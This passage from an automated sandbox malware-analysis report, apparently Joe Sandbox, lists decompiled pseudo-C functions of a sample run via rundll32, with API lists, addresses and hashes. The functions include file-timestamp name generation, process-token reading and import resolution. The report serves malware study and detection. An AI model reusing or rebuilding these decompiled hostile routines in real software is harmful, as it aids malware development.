				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                  0x04b3a5d6
                                                  0x04b3a5df
                                                  0x04b3a5ef
                                                  0x04b3a5ef
                                                  0x04b3a5f4
                                                  0x04b3a5f9
                                                  0x00000000
                                                  0x00000000
                                                  0x04b3a5e9
                                                  0x04b3a5e9
                                                  0x04b3a5fb
                                                  0x04b3a600
                                                  0x04b3a604
                                                  0x04b3a617
                                                  0x04b3a61d
                                                  0x04b3a61d
                                                  0x04b3a626
                                                  0x04b3a628
                                                  0x04b3a62c
                                                  0x04b3a632

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(06AF9570), ref: 04B3A5DF
                                                  • Sleep.KERNEL32(0000000A,?,04B323DE), ref: 04B3A5E9
                                                  • HeapFree.KERNEL32(00000000,?,?,04B323DE), ref: 04B3A617
                                                  • RtlLeaveCriticalSection.NTDLL(06AF9570), ref: 04B3A62C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: f3336fd3734725c6d25140d598215f2ff59640dd418e4e174d6dbaf4e263667e
                                                  • Instruction ID: 3b4b295671f2f5d936ea294dad7c05e2e8b23c9e526e11417cdfd4eb6fa52187
                                                  • Opcode Fuzzy Hash: f3336fd3734725c6d25140d598215f2ff59640dd418e4e174d6dbaf4e263667e
                                                  • Instruction Fuzzy Hash: 9DF06275A002409BE7188F7BD869E197BB9EB08743F55805AF942EB250D639EC00DA35
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B37F27, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E04B37F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04B32049(_t2);
				if(_t34 != 0) {
					_t30 = E04B32049(_t28);
					if(_t30 == 0) {
						E04B39039(_t34);
					} else {
						_t39 = _a4;
						_t22 = E04B3A911(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E04B3A911(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                  0x04b37f27
                                                  0x04b37f31
                                                  0x04b37f33
                                                  0x04b37f39
                                                  0x04b37f39
                                                  0x04b37f42
                                                  0x04b37f46
                                                  0x04b37f52
                                                  0x04b37f56
                                                  0x04b37fca
                                                  0x04b37f58
                                                  0x04b37f58
                                                  0x04b37f5c
                                                  0x04b37f63
                                                  0x04b37f66
                                                  0x04b37f80
                                                  0x04b37f6f
                                                  0x04b37f6f
                                                  0x04b37f73
                                                  0x04b37f76
                                                  0x04b37f7b
                                                  0x04b37f7b
                                                  0x04b37f85
                                                  0x04b37fad
                                                  0x04b37fb3
                                                  0x04b37fb6
                                                  0x04b37f87
                                                  0x04b37f89
                                                  0x04b37f91
                                                  0x04b37f9c
                                                  0x04b37fa1
                                                  0x04b37fa1
                                                  0x04b37fbd
                                                  0x04b37fc4
                                                  0x04b37fc5
                                                  0x04b37fc5
                                                  0x04b37f56
                                                  0x04b37fd5

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04B315A4,?,?,?,?,00000102,04B311DA,?,?,00000000), ref: 04B37F33
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                    • Part of subcall function 04B3A911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04B37F61,00000000,00000001,00000001,?,?,04B315A4,?,?,?,?,00000102), ref: 04B3A91F
                                                    • Part of subcall function 04B3A911: StrChrA.SHLWAPI(?,0000003F,?,?,04B315A4,?,?,?,?,00000102,04B311DA,?,?,00000000,00000000), ref: 04B3A929
                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04B315A4,?,?,?,?,00000102,04B311DA,?), ref: 04B37F91
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04B37FA1
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04B37FAD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 3767559652-0
                                                  • Opcode ID: 719ce9cf640b6a6eac04357e8ff99b38ba75acacf8e3a1f7a970470e539300b3
                                                  • Instruction ID: f58426325153b714442f05af2a4eda764ae654eb6ee28eb4cfb19d688f8d82fe
                                                  • Opcode Fuzzy Hash: 719ce9cf640b6a6eac04357e8ff99b38ba75acacf8e3a1f7a970470e539300b3
                                                  • Instruction Fuzzy Hash: 7E21A5B2504295FBCB129FB6D844A9E7FF9EF45246F1580E5F9059B201DA35E90087A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B37CB8, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E04B37CB8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04B32049(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                  0x04b37ccd
                                                  0x04b37cd1
                                                  0x04b37cdb
                                                  0x04b37ce2
                                                  0x04b37ce5
                                                  0x04b37ce7
                                                  0x04b37cef
                                                  0x04b37cf4
                                                  0x04b37d02
                                                  0x04b37d07
                                                  0x04b37d11

                                                  APIs
                                                  • lstrlenW.KERNEL32(004F0053,75145520,?,00000008,06AF937C,?,04B3747C,004F0053,06AF937C,?,?,?,?,?,?,04B36814), ref: 04B37CC8
                                                  • lstrlenW.KERNEL32(04B3747C,?,04B3747C,004F0053,06AF937C,?,?,?,?,?,?,04B36814), ref: 04B37CCF
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,04B3747C,004F0053,06AF937C,?,?,?,?,?,?,04B36814), ref: 04B37CEF
                                                  • memcpy.NTDLL(751469A0,04B3747C,00000002,00000000,004F0053,751469A0,?,?,04B3747C,004F0053,06AF937C), ref: 04B37D02
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 2411391700-0
                                                  • Opcode ID: ee8a4afdb56999af29db1ea2d5d798588481e2038d9fec93c1560ee46c4a4860
                                                  • Instruction ID: e324e0cb0a8cfee069adddf152521c8f06b488942ee47333373ca19ace1ba276
                                                  • Opcode Fuzzy Hash: ee8a4afdb56999af29db1ea2d5d798588481e2038d9fec93c1560ee46c4a4860
                                                  • Instruction Fuzzy Hash: 90F04F72900118BBDF11DFA9CC85CDE7BACEF0825570140A2ED08D7111E631FA14DBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B33CC8, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlen.KERNEL32(06AF87FA,00000000,00000000,74ECC740,04B3A453,00000000), ref: 04B33CD8
                                                  • lstrlen.KERNEL32(?), ref: 04B33CE0
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • lstrcpy.KERNEL32(00000000,06AF87FA), ref: 04B33CF4
                                                  • lstrcat.KERNEL32(00000000,?), ref: 04B33CFF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                  • String ID:
                                                  • API String ID: 74227042-0
                                                  • Opcode ID: 72fbaac403054c6fa16e75bf218ce38c654259107bea9d55b697d43e10e08eec
                                                  • Instruction ID: aec4713b25835c536e8dd188e83e57d00c362c1e147c814f358089619fecb277
                                                  • Opcode Fuzzy Hash: 72fbaac403054c6fa16e75bf218ce38c654259107bea9d55b697d43e10e08eec
                                                  • Instruction Fuzzy Hash: A4E06D73505264A787119BE6AC48C6FBBADEE896127044457FA00E3110C7389C148BB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: rundll32.exe PID: 6532 Parent PID: 1132 rundll32.exeCOMMON

                                                  Executed Functions

                                                  Function 054712D4, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 93%
                                                  			E054712D4(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x547d278; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x547d238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x547d278; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x547d238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x547d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x547d278; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x547d27c; // 0x1f6a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x547e7f2; // 0x73797325
				_t83 = E054795B1(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x547d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x547d27c; // 0x1f6a5a8
				_t16 = _t93 + 0x547e813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                                  0x054712dd
                                                  0x054712e3
                                                  0x054712e5
                                                  0x054712ff
                                                  0x05471303
                                                  0x05471306
                                                  0x0547157b
                                                  0x05471582
                                                  0x05471582
                                                  0x0547130c
                                                  0x05471321
                                                  0x05471323
                                                  0x05471327
                                                  0x0547132a
                                                  0x0547156b
                                                  0x05471575
                                                  0x00000000
                                                  0x05471575
                                                  0x05471330
                                                  0x0547133b
                                                  0x05471340
                                                  0x05471345
                                                  0x05471348
                                                  0x0547134f
                                                  0x05471356
                                                  0x05471359
                                                  0x0547155b
                                                  0x05471565
                                                  0x00000000
                                                  0x05471565
                                                  0x0547136f
                                                  0x05471373
                                                  0x05471376
                                                  0x05471379
                                                  0x05471381
                                                  0x05471384
                                                  0x0547138d
                                                  0x05471393
                                                  0x0547139d
                                                  0x054713a4
                                                  0x054713a4
                                                  0x054713b6
                                                  0x054713c1
                                                  0x054713cf
                                                  0x054713d4
                                                  0x054713d9
                                                  0x054713dc
                                                  0x054713e1
                                                  0x054713eb
                                                  0x054713ee
                                                  0x054713f1
                                                  0x05471407
                                                  0x0547140b
                                                  0x0547140e
                                                  0x05471559
                                                  0x00000000
                                                  0x05471559
                                                  0x05471425
                                                  0x05471476
                                                  0x05471439
                                                  0x05471441
                                                  0x05471446
                                                  0x05471454
                                                  0x0547145d
                                                  0x05471466
                                                  0x05471466
                                                  0x05471474
                                                  0x05471474
                                                  0x0547147a
                                                  0x0547147e
                                                  0x0547147e
                                                  0x05471484
                                                  0x00000000
                                                  0x00000000
                                                  0x05471486
                                                  0x0547148c
                                                  0x05471533
                                                  0x05471536
                                                  0x05471543
                                                  0x05471543
                                                  0x05471547
                                                  0x00000000
                                                  0x00000000
                                                  0x0547153c
                                                  0x05471540
                                                  0x05471540
                                                  0x05471542
                                                  0x05471542
                                                  0x0547154c
                                                  0x05471553
                                                  0x05471555
                                                  0x00000000
                                                  0x05471555
                                                  0x05471492
                                                  0x05471494
                                                  0x05471494
                                                  0x054714a7
                                                  0x054714ad
                                                  0x054714b8
                                                  0x054714ba
                                                  0x054714be
                                                  0x054714c0
                                                  0x054714c0
                                                  0x054714c5
                                                  0x054714c7
                                                  0x054714c7
                                                  0x054714c5
                                                  0x054714cc
                                                  0x054714d0
                                                  0x054714d0
                                                  0x054714e0
                                                  0x054714e5
                                                  0x054714e8
                                                  0x054714e8
                                                  0x054714eb
                                                  0x054714f5
                                                  0x054714fd
                                                  0x05471502
                                                  0x05471510
                                                  0x05471510
                                                  0x05471524
                                                  0x05471528
                                                  0x05471528

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 054712FF
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 05471321
                                                  • memset.NTDLL ref: 0547133B
                                                    • Part of subcall function 054795B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,054723E9,63699BCE,05471354,73797325), ref: 054795C2
                                                    • Part of subcall function 054795B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 054795DC
                                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 05471379
                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 0547138D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 054713A4
                                                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 054713B0
                                                  • lstrcat.KERNEL32(?,642E2A5C), ref: 054713F1
                                                  • FindFirstFileA.KERNELBASE(?,?), ref: 05471407
                                                  • CompareFileTime.KERNEL32(?,?), ref: 05471425
                                                  • FindNextFileA.KERNELBASE(054796C1,?), ref: 05471439
                                                  • FindClose.KERNEL32(054796C1), ref: 05471446
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 05471452
                                                  • CompareFileTime.KERNEL32(?,?), ref: 05471474
                                                  • StrChrA.SHLWAPI(?,0000002E), ref: 054714A7
                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 054714E0
                                                  • FindNextFileA.KERNELBASE(054796C1,?), ref: 054714F5
                                                  • FindClose.KERNEL32(054796C1), ref: 05471502
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0547150E
                                                  • CompareFileTime.KERNEL32(?,?), ref: 0547151E
                                                  • FindClose.KERNELBASE(054796C1), ref: 05471553
                                                  • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 05471565
                                                  • HeapFree.KERNEL32(00000000,?), ref: 05471575
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                  • String ID:
                                                  • API String ID: 2944988578-0
                                                  • Opcode ID: 3c99cdcdc79d46ee081be034d2d3f91d1274c6dd82bbc987bec726c4d46940e7
                                                  • Instruction ID: 018805d7301e2d4da59d830e91aa7b2d40d027a400185282540d6afac4b8a91b
                                                  • Opcode Fuzzy Hash: 3c99cdcdc79d46ee081be034d2d3f91d1274c6dd82bbc987bec726c4d46940e7
                                                  • Instruction Fuzzy Hash: 318126B1D1011DAFDB25CFA5DC85AEEBBB9FF48300F1045AAE505E6250DB309A45CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 054783B7, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 38%
                                                  			E054783B7(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E05472049(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E05479039(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                  0x054783c4
                                                  0x054783c5
                                                  0x054783c6
                                                  0x054783c7
                                                  0x054783c8
                                                  0x054783cc
                                                  0x054783d3
                                                  0x054783e2
                                                  0x054783e5
                                                  0x054783e8
                                                  0x054783ef
                                                  0x054783f2
                                                  0x054783f5
                                                  0x054783f8
                                                  0x054783fb
                                                  0x05478406
                                                  0x05478408
                                                  0x05478411
                                                  0x05478419
                                                  0x0547841b
                                                  0x0547842d
                                                  0x05478437
                                                  0x0547843b
                                                  0x0547844a
                                                  0x0547844e
                                                  0x05478457
                                                  0x0547845f
                                                  0x0547845f
                                                  0x05478461
                                                  0x05478461
                                                  0x05478469
                                                  0x0547846f
                                                  0x05478473
                                                  0x05478473
                                                  0x0547847e

                                                  APIs
                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 054783FE
                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 05478411
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0547842D
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0547844A
                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 05478457
                                                  • NtClose.NTDLL(?), ref: 05478469
                                                  • NtClose.NTDLL(00000000), ref: 05478473
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                  • String ID:
                                                  • API String ID: 2575439697-0
                                                  • Opcode ID: 4b7c98fe4cf412f543fc4218cb360a7771d13cd3f525563e157047db27b96185
                                                  • Instruction ID: 6ddc214d61c9fcaccb06a873bcd443acdb1ef4126e8c6326def2c5c25ebcf032
                                                  • Opcode Fuzzy Hash: 4b7c98fe4cf412f543fc4218cb360a7771d13cd3f525563e157047db27b96185
                                                  • Instruction Fuzzy Hash: 0C21E6B2A1022CBBDB119F95CC89ADEBFBDEF08750F104066F905A6110D7B19A44DFE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0547ADE5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 39 547ade5-547ae4a 40 547ae4c-547ae66 RaiseException 39->40 41 547ae6b-547ae95 39->41 42 547b01b-547b01f 40->42 43 547ae97 41->43 44 547ae9a-547aea6 41->44 43->44 45 547aeb9-547aebb 44->45 46 547aea8-547aeb3 44->46 47 547af63-547af6d 45->47 48 547aec1-547aec8 45->48 46->45 54 547affe-547b005 46->54 50 547af6f-547af77 47->50 51 547af79-547af7b 47->51 52 547aeca-547aed6 48->52 53 547aed8-547aee5 LoadLibraryA 48->53 50->51 55 547af7d-547af80 51->55 56 547aff9-547affc 51->56 52->53 58 547af28-547af34 InterlockedExchange 52->58 57 547aee7-547aef7 GetLastError 53->57 53->58 62 547b007-547b014 54->62 63 547b019 54->63 65 547af82-547af85 55->65 66 547afae-547afbc GetProcAddress 55->66 56->54 67 547af07-547af23 RaiseException 57->67 68 547aef9-547af05 57->68 59 547af36-547af3a 58->59 60 547af5c-547af5d FreeLibrary 58->60 59->47 70 547af3c-547af48 LocalAlloc 59->70 60->47 62->63 63->42 65->66 71 547af87-547af92 65->71 66->56 69 547afbe-547afce GetLastError 66->69 67->42 68->58 68->67 74 547afd0-547afd8 69->74 75 547afda-547afdc 69->75 70->47 76 547af4a-547af5a 70->76 71->66 72 547af94-547af9a 71->72 72->66 77 547af9c-547af9f 72->77 74->75 75->56 78 547afde-547aff6 RaiseException 75->78 76->47 77->66 79 547afa1-547afac 77->79 78->56 79->56 79->66
                                                  C-Code - Quality: 51%
                                                  			E0547ADE5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x5470000;
				_t115 = _t139[3] + 0x5470000;
				_t131 = _t139[4] + 0x5470000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x5470000;
				_v16 = _t139[5] + 0x5470000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
